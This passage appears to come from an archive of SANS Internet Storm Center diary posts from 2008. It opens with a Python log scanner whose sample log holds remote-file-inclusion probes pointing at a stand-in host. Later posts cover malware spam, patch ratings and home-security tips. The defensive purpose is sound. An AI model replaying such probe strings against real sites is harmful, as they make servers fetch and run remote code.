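    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample log: two RFI probes, two ordinary requests and one
# legitimate libwww-perl script (the diary notes that such scripts exist).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Aug/2008:08:12:01 -0400] "GET //includes/functions_portal.php?phpbb_root_path=http://rfi-host.example/id2.txt?? HTTP/1.1" 404 5096 "-" "libwww-perl/5.810"
203.0.113.5 - - [19/Aug/2008:08:12:02 -0400] "GET /errors.php?error=http://rfi-host.example/TT??? HTTP/1.1" 404 5481 "-" "libwww-perl/5.811"
198.51.100.7 - - [19/Aug/2008:08:13:10 -0400] "GET /diary.html?date=2008-08-19 HTTP/1.1" 200 21877 "http://isc.sans.org/" "Mozilla/5.0 (X11; U; Linux i686) Gecko/20080722 Firefox/3.0.1"
198.51.100.9 - - [19/Aug/2008:08:14:00 -0400] "GET /include HTTP/1.1" 404 5020 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.44 - - [19/Aug/2008:08:15:33 -0400] "GET /feeds/rss.xml HTTP/1.1" 200 3120 "-" "libwww-perl/5.79"
"""

REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    # The request field is "METHOD target PROTOCOL"; a malformed request may lack parts.
    parts = entry["request"].split(" ")
    entry["method"] = parts[0] if parts else ""
    entry["target"] = parts[1] if len(parts) > 1 else ""
    return entry


def rfi_parameters(target):
    """Return (name, value) pairs whose value is an absolute URL.

    A remote URL handed to a PHP include path (phpbb_root_path=http://...)
    is the signature of an RFI probe, regardless of which script it targets.
    """
    _, _, query = target.partition("?")
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def classify(entry):
    """Collect the reasons an entry looks like an RFI probe (strongest first)."""
    reasons = []
    for name, _ in rfi_parameters(entry["target"]):
        reasons.append("remote URL in parameter %r" % name)
    if entry["target"].startswith("//"):
        reasons.append("doubled leading slash, as in the probes quoted in the diary")
    if entry["agent"].lower().startswith("libwww-perl"):
        reasons.append("libwww-perl user agent (weak signal on its own)")
    return reasons


def scan(log_text):
    """Return findings for lines carrying a remote URL parameter.

    The user agent is reported but never sufficient by itself, so the
    legitimate libwww-perl request in the sample is not flagged.
    """
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not rfi_parameters(entry["target"]):
            continue
        findings.append({
            "host": entry["host"],
            "status": entry["status"],
            "target": entry["target"],
            "agent": entry["agent"],
            "reasons": classify(entry),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%s %s %s" % (f["host"], f["status"], f["target"]))
        for r in f["reasons"]:
            print("    - " + r)
```

Feeding a real access log through `scan()` gives a list of source hosts and targeted scripts to review, without blocking the legitimate libwww-perl clients the diary mentions.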

And while I am at it ;-). For all the PHP coders out there... I will be offering the best PHP security class ever at NS2008!

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-17

Not-So "Breaking News"

The spoofed CNN and MSNBC messages from last week have altered a bit, taking on a more generic approach.

The subject of the message is still: BREAKING NEWS.

Michael has been tracking these botnets for a while, his work is available here: http://www.vivtek.com/projects/despammed/stormspam.html.

Like the others, this first stage is a downloader, still reaching out to 66.199.240.138 to get the rest of the goodies.  Unlike the previous waves, the first executable is named install.exe instead of adobe_flash.exe.  So there's a little something different to search for in your proxy logs.

-KL

 

3 Comments

Published: 2008-08-17

Volatility 1.3 Released

The folks over at volatilesystems.com have released version 1.3 of their Volatility Framework (https://www.volatilesystems.com/default/volatility), an open source collection of tools that allows an investigator to examine RAM dumps (crash dumps and hibernation files).

-KL

0 Comments

Published: 2008-08-16

Another Infected Digital Photo Frame

Reader Greg sent us a note today about a new issue with digital photo frames.  Here is what he said:

Bought a couple of Vuescape 1.4" Digital Picture Frames from Inkstop, to give to family members for Christmas.  Just tried to install the software on my PC, and found that the setup.exe file was infected with AdClicker-DF.  It seems impossible to find an installer for the device online that does not have this infection.  I found another version of the program needed to work with the photo frame - PhotoViewer.exe - but it does not seem to recognize this device.

The mini-CD that came with the frames (item# 61000090) is labelled Driver and Utilities version 2.3B.  The Photoviewer software is, according to the properties sheet, published by Hojy Tech Corp.

This is a bit different from the digital photo frame infections we reported earlier this year.  In that previous case, the frames themselves contained malware.  In this new case the setup.exe file on the CD is infected with adware.

If you have seen this same phenomenon in consumer products you've purchased recently (setup.exe containing malware) please let us know what the item was, what the malware was, and where you bought it.  By the way, many products come with extra programs that are often detected as spyware or adware.  We don't need to know about that, just cases of the setup or installer program itself being infected.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-16

nslookup Issue?

Two readers pointed us to a SecurityFocus item concerning Microsoft's nslookup.exe.  Details are at:

http://www.securityfocus.com/bid/30636/

A video showing a crash analysis of nslookup.exe is at

http://www.nullcode.com.ar/ncs/crash/nsloo.htm

If anybody has experienced an nslookup.exe crash or knows more about this vulnerability please let us know via our contact page.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-16

Thoughts on the Russia vs Georgia Cyber War

In the past week there has been a lot of media reporting on cyber attacks coming from Russia that are directed at Georgia.  Some examples are John Markoff's story in the New York Times, or Siobhan Gorman's story in the Wall Street Journal.  Others have been blogging about their experiences and many readers of our diaries have probably been called by local media outlets for comment.

Over the past years there have been many of these "cyber wars" that infatuated the media.  Remember the Great Chinese-American cyber war of 2001 following the downing of a Chinese fighter plane and a US spy plane?  Also the Israeli-Palestinian cyber conflicts, the Indian-Pakistani sparring, Chinese-Taiwanese conflicts, and of course last year's episode with Estonia?

They seem to all follow a similar pattern:

  1. Some real-world event happens that focuses attention on a specific region
  2. The media goes looking for a new angle to report on and finds one in cyber space
  3. The online community, both sympathetic as well as curious, read the stories and get interested
  4. A "cyber war" starts
  5. The media has a field day

In the case of Georgia I think that a new pattern is emerging:

  1. Because of the large number of bots, botnets, and general level of criminal behavior on the Internet, a level of "background noise" is always present in every corner of cyberspace, including small countries like Georgia
  2. When the real-world event happens and the media starts looking for activity (steps one and two above) they immediately find it because of the "background noise" (this is like turning on the lights in the kitchen and seeing hundreds of cockroaches - you can acknowledge that you've got a roach problem and kill them or you can turn off the lights and PRESTO! they magically all go away, therefore no more roach problem)
  3. A story or two is published about a defaced website or the presence of botnets, or some other event that would normally occur because of the background noise, but it's tied to the developing real-world story
  4. The online community hears about the event and wants to go see for themselves, resulting in a massive denial of service attack against a small country that nobody ever visits but is now being overwhelmed by curious cyber tourists wanting to see what is going on
  5. The small country blames the DoS attack on their adversaries who of course deny wrongdoing
  6. Citizens of the adversary country are also interested in seeing what is happening and so their IP addresses begin to show up in the logs, further lending credit to the growing theory that a cyber war is erupting from the larger and more aggressive country
  7. Citizens of other countries who want to "play" now jump into the fray and start launching real, no-kidding "attacks" against the small country just for kicks, but also to brag to their friends about how they are now Soldiers of Fortune in this brave new world
  8. Before you know it, the combination of media stories, tourists, vandals, criminals, and yes - there might even be a couple of "real" cyber warriors in all of this - all mix together in a torrent of hacking and whacking that reaches a crescendo before slowly tapering off into the history books
  9. Rinse and repeat

I realize that I'm being very cynical here, and that the future prospects of real, no-kidding, nation-state cyber warfare are very possible.  But folks, let's get real.  Is a botnet or a website defacement an act of war?  Is an overwhelming bunch of cyber tourists an act of war?  I think not.  But for the next few years I can predict with certainty that any time a physical-world invasion or conflict emerges, somebody will immediately go looking for the cyber angle.  And they will find one, and they will undoubtedly call it a cyber war.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2008-08-15

WebEx ActiveX buffer overflow

Last night, Cisco (who now owns WebEx) posted a bulletin about a buffer overflow in the WebEx Meeting Manager ActiveX control.  This one looks like it has the potential to be serious, so if you use WebEx, you are advised to read the Cisco advisory and update or set the killbit.

 

References:

http://www.cisco.com/warp/public/707/cisco-sa-20080814-webex.shtml

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2737 (not live yet)

0 Comments

Published: 2008-08-15

Another MS update that may have escaped notice

Those of you running automatic updates may have noticed more updates being downloaded this week than what we mentioned in our Black Tuesday overview.  Among the additional updates was the one described in this advisory which had to do with killbits for 3rd party ActiveX components.  The following comment from the overview sums it up nicely, so I'll repeat it here (thanx, anonymous):

Microsoft also released 953839, which is an updated variant of MS08-032 (950760). This is the ActiveX Killbits update. This release only adds 3rd-party killbits to the list, so they didn't give it a bulletin. But you still want to deploy it . . .

0 Comments

Published: 2008-08-15

OMFW 2008 reflections

It was my great privilege to participate in OMFW this past Sunday afternoon in Baltimore.  Unfortunately, I wasn't able to stay for the rest of DFRWS, the program looked pretty good (more on that below) and the folks that I've talked to who were there said it was a great conference.  While I love SANS conferences, the academic in me also likes traditional conferences with peer-reviewed papers.  Back to OMFW.  AAron was able to bring together an outstanding group of folks interested in "memory forensics" and there was some spirited discussion among the participants along with some really outstanding talks/demos (hopefully, I'll be able to update this story soon with a link to the slides from the talks).  It was also great to be able to put faces to folks who until then had only been handles in IRC or names on e-mail/blog posts in the past.  Next year's DFRWS (and hopefully another OMFW) will be in Montreal.  Keep your eye on it, there is a lot of good research going on there and don't forget about the SANS Forensics Summit coming up in Vegas in October.

 

A couple of the interesting papers from DFRWS that I need to read:

http://dfrws.org/2008/proceedings/p26-dolan-gavitt.pdf

http://dfrws.org/2008/proceedings/p33-morgan.pdf

http://dfrws.org/2008/proceedings/p52-vanBaar.pdf

http://dfrws.org/2008/proceedings/p112-cohen.pdf

http://dfrws.org/2008/proceedings/p128-thonnard.pdf

 

 

0 Comments

Published: 2008-08-15

Joomla user password reset vulnerability being actively exploited

We've received reports from several readers (thanx, Ronaldo and anonymous) that they have seen successful exploitation of the Joomla user password reset vulnerability announced on 12 Aug (with an exploit posted to milw0rm at about the same time).  If you have not yet upgraded to 1.5.6, do so ASAP.

References:

http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html

http://www.us-cert.gov/current/index.html#joomla_password_reset_vulnerability

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3681

0 Comments

Published: 2008-08-14

SBC Outage?

One of our readers, Michael, sent us in a heads up for a possible problem this morning with the Internet backbones.  Since this is our first report, does anyone know the scoop?  Joel reported on another issue with SBC earlier this week.

internetpulse.net shows the latency at LAX and a blogsite here. 

1 Comments

Published: 2008-08-14

DNSSEC for DShield.org

Too many times over the last few weeks, you heard that the real answer to all the DNS problems is DNSSEC. I decided to give it a try, and signed the dshield.org zone. DNSSEC is not exactly used very widely, and it is very possible that we will be running into some problems. If you experience any issues, please let us know (via isc.sans.org ;-) ). For most users, this will not change anything. It only matters if your resolver or your web browser actually verifies DNSSEC signatures. Expect a few changes to our dshield.org zone while I experiment.

"Experimenting" with a production setup isn't exactly ideal. But there is always isc.sans.org. On the other hand, many of the aspects of DNSSEC just can't easily be simulated in a lab.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-13

Podcast Episode Nine Posted

Okay, so after much craziness concerning the Live Podcast from SANSFIRE of Episode 9, it's finally posted.

So to give you a quick run down on what took us so long to get this thing posted, all of the mics that were being used were going into a Soundboard, and the Soundboard audio was going directly out to a DVD recorder.  The DVD recorder also had video In from a camera in the back of the room that was being manned during the podcast.

Turns out, the camera was also recording!  Isn't that awesome?  Well, turns out, there is a lot of FAIL in this story.

The camera has mysteriously vanished.  Don't know where it went, but in it somewhere, wherever it is, is a recording of the podcast.  If someone finds this mythical recording, please, feel free to give me the video/audio off of what is inside it.

Wait, you say, what about the DVD Recorder?  Well, we got the DVD, but the DVD has a big fat scratch down the middle of it, and we can't get the video off of it.

But luckily, I had garageband open, and I recorded the podcast using my built in mic on my macbook pro.  Now, this is not the best audio in the whole wide world, but at the time, we had no alternative. So THAT's what the audio from the podcast is.  Not out of the soundboard, not off of a video camera, but off of my built in mic on the MacBook Pro.

As a result the audio of some of the people, unless they were loud, or speaking into a mic, is not the best.  You'll hear some of this in the beginning, but once we got everyone speaking into mics, and being loud, it gets a bit better.

You'll also hear me whispering for beer at some point in the beginning, just disregard that, beer was needed. :)

Enjoy.

-- Joel Esler http://www.joelesler.net

0 Comments

Published: 2008-08-13

CNN switched to MSNBC

The malware spamming out CNN alerts is now picking on MSNBC. The links do lead to malware; advise your users not to click on them! I have seen hundreds this morning, and a number of readers have written in about them. The headlines vary, but they all appear to start "BREAKING NEWS".

Cheers,
Adrien de Beaupré intru-shun.ca

6 Comments

Published: 2008-08-12

August 2008 Black Tuesday Overview

Overview of the August 2008 Microsoft patches and their status.

Columns: # | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) (clients / servers)

MS08-041 - Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
  Affected: Access, Snapshot Viewer
  CVE: CVE-2008-2463
  Contra Indications: KB 955617
  Known Exploits: Known exploit code being actively exploited. This is a workaround by implementing a kill bit.
  Microsoft rating: Critical
  ISC rating: clients Critical / servers Important

MS08-042 - Vulnerability in Microsoft Word Could Allow Remote Code Execution
  Affected: Word
  CVE: CVE-2008-2244
  Contra Indications: KB 955048
  Known Exploits: Known exploit code being actively exploited.
  Microsoft rating: Important
  ISC rating: clients Critical / servers Important

MS08-043 - Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution
  Affected: Excel
  CVE: CVE-2008-3003, CVE-2008-3004, CVE-2008-3005, CVE-2008-3006
  Contra Indications: KB 954066
  Known Exploits: No publicly known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical / servers Important

MS08-044 - Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution
  Affected: Office 2000, XP 2003, Works 8, Project
  CVE: CVE-2008-3018, CVE-2008-3019, CVE-2008-3020, CVE-2008-3021, CVE-2008-3460
  Contra Indications: KB 924090
  Known Exploits: No publicly known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical / servers Important

MS08-045 - Cumulative Security Update for Internet Explorer
  Affected: Internet Explorer
  CVE: CVE-2008-2254, CVE-2008-2255, CVE-2008-2256, CVE-2008-2257, CVE-2008-2258, CVE-2008-2259
  Contra Indications: KB 953838
  Known Exploits: Publicly disclosed vulnerability but no known exploits.
  Microsoft rating: Critical
  ISC rating: clients PATCH NOW! / servers PATCH NOW!

MS08-046 - Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution
  Affected: Windows 2000, XP, 2003
  CVE: CVE-2008-2245
  Contra Indications: KB 952954
  Known Exploits: No publicly known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical / servers Important

MS08-047 - Vulnerability in IPsec Policy Processing Could Allow Information Disclosure
  Affected: Vista, 2008
  CVE: CVE-2008-2246
  Contra Indications: KB 95373
  Known Exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Important / servers Important

MS08-048 - Security Update for Outlook Express and Windows Mail
  Affected: Windows (OE, Mail)
  CVE: CVE-2008-1448
  Contra Indications: KB 951066
  Known Exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Important / servers Important

MS08-049 - Vulnerability in Event System Could Allow Remote Code Execution
  Affected: Windows
  CVE: CVE-2008-1456, CVE-2008-1457
  Contra Indications: KB 950974
  Known Exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Important / servers Important

MS08-050 - Vulnerability in Windows Messenger Could Allow Information Disclosure
  Affected: Windows Messenger
  CVE: CVE-2008-0082
  Contra Indications: KB 955702
  Known Exploits: Publicly disclosed vulnerability but no known exploits.
  Microsoft rating: Important
  ISC rating: clients Important / servers Important

MS08-051 - Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution
  Affected: PowerPoint
  CVE: CVE-2008-0120, CVE-2008-0121, CVE-2008-1455
  Contra Indications: KB 949785
  Known Exploits: No publicly known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical / servers Important

We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

 

1 Comments

Published: 2008-08-12

Upcoming Infocon Test and new Color

Just a reminder... the test will start shortly.

 

This Friday, we will change the infocon to test a new admin interface. The test will last from 10:00-11:00 EDT (14:00-15:00 UTC). We will cycle through all colors. The pager notifications will be disabled during the test.

In the future, we are planning more regular infocon tests. Probably once a month, but the schedule has yet to be determined. In order to conduct the tests, we will use a new color "Blue". Blue is used only for tests. Pager alerts will not be disabled for these tests to allow you to test them as well.

For details about the infocon, see http://isc.sans.org/infocon.html .

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

11 Comments

Published: 2008-08-12

VMWare ESX 3.5u2 Errors

VMWare has an important announcement if you are using VMWare ESX 3.5u2: This particular version will "expire" today (August 12th). If you restart the server, or move a virtual machine, you will get an error and you will not be able to start up the machine or use VMotion.

In short: If you use this exact version of VMWare ESX: Don't touch it until you hear from VMware about a solution. As a work around, you can change the system time to a date before Aug. 12th and turn off NTP.

Links:
communities.vmware.com/thread/162377

www.vdi.co.nz/

 

(thanks to a number of readers who alerted us about this! And thanks to all the Australian VMware users who of course ran into this first)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-12

SBC Outage in Cleveland?

SBC Outage in Cleveland?  Perhaps? 

We've only had one report today of any problems, however, we don't know if SBC has changed their routes to avoid InternetHealth, or what the deal is, but it looks like something is up.

 

-- Joel Esler http://www.joelesler.net

1 Comments

Published: 2008-08-12

Gmail Outage?

Getting reports here at the Storm Center of an outage for Gmail.  I can't replicate it, it works fine for me from two Internet access points.  Is it still down on the interwebz for you guys?

-- Joel Esler http://www.joelesler.net

1 Comments

Published: 2008-08-12

Defcon 16 reflections

As promised I thought I would send up a post about Defcon, since it's fresh on a lot of our minds.

Despite what people think, this is still a good con.  Still breakthrough talks happening, still "zero" days coming out.  Thousands of Thousands of people there. 

The Goons did a great job keeping everything flowing and organized.  (Although, could have ordered more badges on day 1?)  Even though the hotel posted guards around the ATMs, the Nevada Gaming Commission and some Cops were investigating a Horse Race Betting Machine (could have been totally legit, I didn't ask, I don't want to know.  It was just funny and coincidental), and various other interesting tidbits.

There were a lot of interesting talks, obviously I couldn't attend them all, but the ones that I heard were very interesting (BTW -- I am going to link to the presentations that I can, click through AT YOUR OWN RISK):

Kaminsky -- Although I heard that there was basically nothing new posted, (I wasn't there, I was on a plane), it was interesting to hear him present about the vuln.

BGP Hack -- I did hear that this WAS the most interesting talk.  From what I heard/read, the guys that were presenting were able to successfully demonstrate how they changed the BGP routing at Defcon and sent everything through a box in New York, only to come back to Vegas.  Apparently they did this live.  Nice.

Snort plugin development -- Of personal interest to me, I sat in on this talk about Snort dynamic-preprocessor and rule development. 

(From an anonymous reader, I didn't see this one, nor hear about it.) -- The Medical Identity Theft talk at DC16 had an unannounced software release...  They wrote a tool to decrypt LWAPP packets and output a regular pcap file showing the unencrypted wireless client traffic.

Fyodor's Talk on Nmap -- Funny, excellent, interesting!

As always, the Capture the Flag contests were great and interesting.  Spot the fed was funny (as always), as were several of the other contests:

Sit through 30 hours of vendor presentations without sleeping to split US10k.

Automate a pellet/paintball gun to shoot targets.

Guitar Hero 3 (Holy cow, the guys that play this on Expert are CRAZY fast!)

The Freakshow party (as most the parties I went to were) on Saturday was awesome.  Props go to Sunshine and whomever was on her side for planning that one!  Great conference everyone.

 

-- Joel Esler http://www.joelesler.net

2 Comments

Published: 2008-08-11

Recovering

As everyone seems to be recovering this morning so far from Defcon, the news around the campfire has been quiet.  I am going to post some followups and interesting (to some) tidbits of Defcon a bit later today when I get a chance, right now, the Handlers are still sorting through email. 

 

If you have something you'd like to share, a particular talk you went to, or an 'undocumented' event... Contact us at http://isc.sans.org/contact.html

 

-- Joel Esler http://www.joelesler.net

0 Comments

Published: 2008-08-10

From lolly pops to afterglow

For those of you who are as many in years as some of the ISC handlers, you may remember that Kojak star Telly Savalas had a singing career as well as one playing a lollipop sucking cop in New York. He had a UK number 1 hit for the song "If" which had the immortal lyrics

"If a picture paints a thousand words,
Then why can't I paint you?"

Well in the security world we are following the lyrics of David Gates and using visualisation as a powerful technique in security log analysis.

The Davix Live CD distribution has been released and it contains a wide selection of security tools which are categorised in the Capture, Process and Visualise groups.

If you are interested in the power of Visualisation techniques in security analysis, it is well worth a look.

 

0 Comments

Published: 2008-08-10

Alex and Mark get the girls

Well as Blackhat and Defcon come to a close today in Vegas, some of the presentations are surfacing on the web. One which is already rightly attracting some interest is  "How To Impress Girls With Browser Memory Protection Bypasses" by Alexander Sotirov and Mark Dowd.

You can catch up with the presentation if you missed out on the Vegas heat by jumping across to their site.

0 Comments

Published: 2008-08-10

Fake IE 7 update spam doing the rounds

A number of readers have alerted us to a round of IE7 update spam being sent out. The e-mails read:


You are receiving this e-mail because you subscribed to MSN Featured Offers.
Microsoft respects your privacy. If you do not wish to receive this MSN Featured
Offers e-mail, please click the "Unsubscribe" link below. This will not unsubscribe
you from e-mail communications from third-party advertisers that may appear in MSN
Feature Offers. This shall not constitute an offer by MSN. MSN shall not be
responsible or liable for the advertisers' content nor any of the goods or service
advertised. Prices and item availability subject to change without notice.

Well, true enough, Microsoft will not be responsible as it's not from them! (Shock / Horror).

For the sample we received, VT has good coverage:

http://www.virustotal.com/analisis/18b97fb3bc30251051a8542a90401b6f

 

 

1 Comments

Published: 2008-08-09

A Few Tips to Help You Protect Your Home Computer

 

A few days ago I did a diary called Lessons Learned https://isc2.sans.org/diary.html?date=2008-08-03.  In the diary I talked about the many home computers out on the net and within our own networks that are compromised by malicious programs and are allowing our computers to be taken over by the bad guys on the net.   I had stated that it was our responsibility to educate the home and small business computer users to the dangers of the Internet and how they can protect themselves.  That is where the idea for this diary originated.  Let me first say, I don’t have all of the answers.  If I did, I would be rich and wouldn’t have to work again.  And not everyone is going to agree with the things I say.  If you don’t, if you have a better idea or alternative to one of my suggestions, or if you have one of your own, let me know.  I will add some of the best ideas to the diary. That said, here are some ideas…tips from me. 

 

  • Back up your important data.  At any point in time you could have a catastrophe happen and you suddenly realize your data is gone.  It has happened to the best of us.  You have a hard drive crash, you have a worm or other malicious program install and suddenly everything is gone.  That is Murphy’s Law when it comes to computers.  So back up your data, back it up often.  How often really depends on you and your data.  How often does your data change?  How long would it take you to recreate it?  These things are going to determine how often you will want to do backups.  As for how to do the backups, that depends too.  I do backups to disk using the old zip drives for all of the files that I want to be able to restore quickly.  I also use a service called Mozy backup. 

Mozy is great for storing your files online.  If you have less than 2 gig of data to backup you can use Mozy Home.  The data is encrypted and stored on a secure server and the backups run daily at what ever time you choose.  The first time your backup is going to take a while to run.  After that the backup is pretty quick due to the fact it will only back up the files that have changed.  If you have more than 2 Gig of data or if you want to go to the next level of security you can use Mozy Pro.  Mozy Pro adds more encryption, more security and faster upload and download and other features and enhancements at a very reasonable price.  There is a Mac client available as well as a PC version.  Go to www.mozy.com for more information.

 

Whatever methods you choose, make sure that you test the restore often, just to make sure that the data is really getting backed up.

 

  • Install an antivirus / anti-spyware program and make sure that you check it often to ensure that it is getting the important updates.  If your ISP offers a security suite, consider taking advantage of their service.  They have your best interest at heart, but they are also interested in protecting their network and resources.  My company offers SecureIt (www.securitycoverage.com) to all of our customers.  This program combines anti-virus, anti-spyware, Windows Updates, parental controls, firewall and reports all rolled into one package.  It never expires as long as you pay the bill.

You can also go to your local office supply store or retail store and buy Norton, McAfee, Trend Micro, or any number of other packages.  Take them home, uninstall your old version, install the new version and do the updates immediately.  Make sure you set the computer to update the definition files every day and scan at least once a week.  Also make sure that you do your annual renewal.  If you fail to renew your subscription you will still be protected from the old exploits but not from any of the new ones.  When you consider that there are 50 or so new viruses/Trojans/worms discovered every week, that means a lot of potential damage to your computer.  Also, make sure that the package you purchase includes an anti-spyware program as well.  In today’s world of exploits the spyware creators are actually more dangerous than the virus creators.

  • Install a firewall in your network.  If you have an “always on” connection to the Internet (DSL or cable modem) and your ISP doesn’t provide a router, you will probably want to run to your local Best Buy, Staples, or other computer/office supply store and pick up an inexpensive router; just make sure that it has firewall capability.  Take it home and follow the manufacturer’s instructions to install it.  As soon as it is installed, find the instructions for changing the password and default IP address and change them immediately.  I just recently purchased a little Netgear device for my home network.  I was really impressed when I got it home and started working with it.  They had added a lot of great new features that can be used to secure your network.  If you are using a wireless network in your home, absolutely without a doubt, change your router to use encryption.  Here is a really good web site that explains how to secure your wireless network: http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm

Just make sure that you turn on WPA (I recommend WPA2 as a minimum) and set up a secure key to protect your network from outside access.  This will prevent someone from jumping onto your wireless network and using your Internet connection for evil purposes or to hack into your computers.

  • Apply all patches for your operating system.  If you are like most people and you are using one of the Microsoft OSes, turn on Automatic Updates.  This will allow your computer to get the updates from Microsoft as soon as they are available.  Microsoft releases its monthly updates on the 2nd Tuesday of every month.  Check our Diary at isc.sans.org for an explanation of what the updates cover.

  • Create a new account to serve as the Administrator account, and don’t use the name Admin, Superuser, or anything else that would indicate that it is the Administrator account.  Use this account ONLY for things that require Administrator privilege.

  • Create another account that is a regular user account.  This account will be used on a day-to-day basis.  This will prevent some of the malicious content on the net from being installed on your computer ad hoc.

  • On all of your user accounts use strong passwords.  Don’t use anything that can be identified with you such as your name, birthdate, spouse’s/child’s name, pet’s name, or any word found in the dictionary.  Many programs exist on the Internet that can be used to crack easy passwords in a short amount of time.  Try using phrases or, better still, take the phrase, pull out the first and last letter of every word and use that as your password.  Or try replacing characters with numbers, such as a 0 (zero) instead of the O, a ! instead of a 1, a 3 instead of an e, etc.  Don’t use the same password on every site you log on to either.  In other words, don’t use the same password for your Amazon account or your iTunes account as you do for your bank or credit card web sites.  Try mixing it up a little.  For instance, if you use the phrase The Fox Ran Fast and you bank at Wells Fargo and you have a Citibank credit card – try these for passwords.  Your base password might be tefxrnft – now for Amazon you add az and the year you were born, so your Amazon password might look something like tefxrnft54az, your bank password might be wftefxrnft54 and your Citibank password might be cb54tefxrbft.  Now if you want to be really secure you can change the e to 3, as in wft3fxrnft5$.  I think you get my drift.  Be creative, but safe.  If you want to see how secure your current password is, check out this site from Microsoft.

 www.microsoft.com/protect/yourself/password/checker.mspx

  • Use care when surfing the net, chatting on IM and opening emails.  Don’t click on links in emails unless you are absolutely certain that you know the origin of the email.  Just because it looks like it came from Aunt Sally there is no guarantee that it really did.  It could have come from someone masquerading as Aunt Sally or it could have come from Aunt Sally’s infected computer.  When surfing the net be very careful that you only surf to trusted sites.  Even some trusted sites can become compromised, so if you are on a site or doing a search in your favorite search engine, do so with caution.  If you are prompted to install a program, err on the side of caution and say no.  Never install software just because a pop-up tells you to install it.  This happened to my daughter the other day.  She is fully protected with AV, anti-spyware and firewall.  However, she did a Google search looking for some information on motorcycle parts.  A window popped up and said that she had a potential infection on her computer.  Did she want to install Anti Virus 2008 and clean up the infection?  She thought that was her AV program telling her to update and she clicked yes.  Of course it installed.  Then she got the message that she needed to buy the program in order to do the scan.  She kept clicking cancel but the program would not close.  A cleanup of her computer took about 2 hours, and then a half-hour lecture followed about clicking yes.  As my mom used to say when cleaning the leftovers out of the refrigerator – if in doubt, throw it out.  Same goes for clicking.  If in doubt, just say no.

  • Don’t download from untrusted sources.  There are some free programs on the Internet that can help with cleanup of your computer and help keep your computer running smoothly.  Some of these are good little tools.  Just be careful where you download from.  Only go to trusted sites to download programs.

  • Set your email to plain text instead of html.  This will prevent the links in your email from being clickable and will prevent malicious code hidden in the email from running when you open the email.

  • Do some simple things to protect your computer.  Turn off File and Print Sharing, NetBIOS or any other service that you don’t need to use.  A site with good information for home computer users running Windows is www.microsoft.com/protect.  This site has a lot of tips for the home computer user.

  • There are many cool new toys that can add some zip and zam to the computing experience.  Many of them use the computer’s USB port to connect and have storage capabilities.  Whether it is the memory card for your digital camera, your MP3 player, your flash drive/thumb drive for removable storage, a removable hard drive or a digital photo frame, you may get more than you bargained for when you plug them in.  We have had reports of malicious software on all of these devices, brand new, out of the box.  Use care when plugging in USB storage devices.  Before you plug in any USB device, turn off autorun (http://antivirus.about.com/od/securitytips/ht/autorun.htm) and virus scan the device.

  • Never give out your personal information online.  There are a lot of phishing emails circulating that attempt to convince you that your personal information is needed by your bank, credit card company or other financial institution.  There are some circulating that want you to believe they are from the IRS, the Dept. of Revenue or another government agency.  They are simply trying to trick you into giving them your identity.  Don’t let them trick you…  don’t answer, just throw it away.

